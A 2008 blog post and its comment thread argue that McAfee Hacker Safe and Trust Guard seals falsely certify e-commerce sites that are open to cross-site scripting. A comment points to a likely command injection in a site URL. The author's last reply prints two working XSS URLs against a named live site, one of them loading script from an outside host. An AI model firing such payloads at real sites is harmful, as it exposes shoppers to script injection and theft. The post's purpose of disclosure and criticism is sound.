Friday, April 25, 2008

Still not Hacker Safe, roll the video

Accuse me of beating a dead horse, but this really ticks me off. While preparing content for my monthly column, as well as presentation content for the ISSA NW Regional Security Conference, I found yet another bunch of McAfee Hacker Safe branded sites that are completely vulnerable to cross-site scripting (XSS), as well as other issues. The video I took points out only reflected, non-persistent vulnerabilities...no sites were harmed in the making of the video, and all sites have been advised. Nonetheless, let me make my point yet one more time.
1) Sites that are vulnerable to XSS are not PCI compliant. All of the sites in this video take CC payments and store customer information.
2) The sites in this video have been vulnerable for months. Additionally, some have been advised multiple times and have simply ignored my notices. Their McAfee Hacker Safe branding is active and has not been removed at any time.
3) The McAfee Hacker Safe service claims XSS as part of its vulnerability checks; sites that are vulnerable to it should not be showing the McAfee Hacker Safe label in perpetuity.
THEY ARE NOT HACKER SAFE AND CONSUMERS ARE AT RISK.

Please join me in protest by adding a comment to my open letter to Ken Leonard, CEO of Scan Alert. Send them email, ask the sites to fix the issues.
Unknowing consumers deserve far more than false claims of security and empty assurances designed to grow McAfee/ScanAlert revenues.
As I am not the only person greatly concerned over this issue, please visit Rafal Los' fine blog for additional findings.
Enjoy the video.

del.icio.us | digg

6 comments:

Wireghoul said...

I suspect that your second url.. the delaware one is also trivial to command inject into. From the url in your address bar before the XSS attempt I noticed:

...phlfares.db%7c%2Fvar%2fwww%2fcgi-bin...

which immediately raised a red flag! It decodes to phlfares.db|/var/www/cgi-bin and suggests that the argument is passed to an open() call!

HackerSafe is very much like Clippy, fancy graphics with no real value.

Anonymous said...

Try and do your research first, this story is almost 2 years old:

http://www.0x000000.com/index.php?i=40

bye, Michal

Russ McRee said...

Michal, thanks for proving my point. I'm not trying to paint this as a new issue, nor one I discovered. The fact that it continues unabated, for 2 years, is a sad indicator of how pathetic the premise of Hacker Safe or Hacker Proof, and now McAfee Secure, really is. These "security" companies must stop driving revenue for themselves and their customers, and take more stringent steps to protect the consumers who believe what they see in a logo.

Peter K said...

Another important point to consider is the price. I mean these guys are very expensive. I actually ended up with a Business Verification seal from Merchant-Safe.com and saw a jump in conversion.

Now I got another call from Hacker Safe regarding scanning and I started browsing and found this article..

I agree with the previous comment, these security companies must focus on consumer and website security rather than driving profits up.

I think for small businesses Merchant Safe trust seals are a better and chepaer alternative to Hacker Safe. Because in the end all seal programs can do only so much. At the most a bump in conversion of about 15-20%. It is "your product" that has to sell based on what it has to offer.

Dan G. said...

It's important to note that many people don't use Hacker Safe for security. Having a hacker safe logo on your site helps increase conversion as there is a verification process here. Look at this site Trust the Seller and you will see why it increases sales as well as some other options to McAfee Secure / Hacker Safe.

Russ McRee said...

Dan G,
It's clearly evident that these services, and the businesses they peddle to, have conversions in mind, rather than security, but I believe they are therefore beholden to do something other than the most rudimentary of scans before placing the badge on a site, indicating it is safe. The post you refer to promotes Trust Guard. If we can find security issues in Trust Guard-badged sites, why then should anyone but the clueless believe they are valid or worthy in any way? Who are they protecting, the site operator or the customer? Sadly, we all know it's the site operator's revenue stream they're interested in. Customer be damned.
Here's an example.
Before: https://www.radiantsmile.net/
After:
https://www.radiantsmile.net/order/login.php?go=%22%3E%3Cmarquee%3E%3Ch1%3EThis_site_is_complicit_in_Trust_Guard%27s_fraudulent_conversion_driving_scheme.%3C%2Fh1%3E%3C%2Fmarquee%3E
Or:
https://www.radiantsmile.net/order/login.php?go=%22%3E%3Cscript%20src%3Dhttp%3A//holisticinfosec.org/js/pleasefixme.js%3E%3C/script%3E
Trust Guard's no better than the rest. Just cheaper.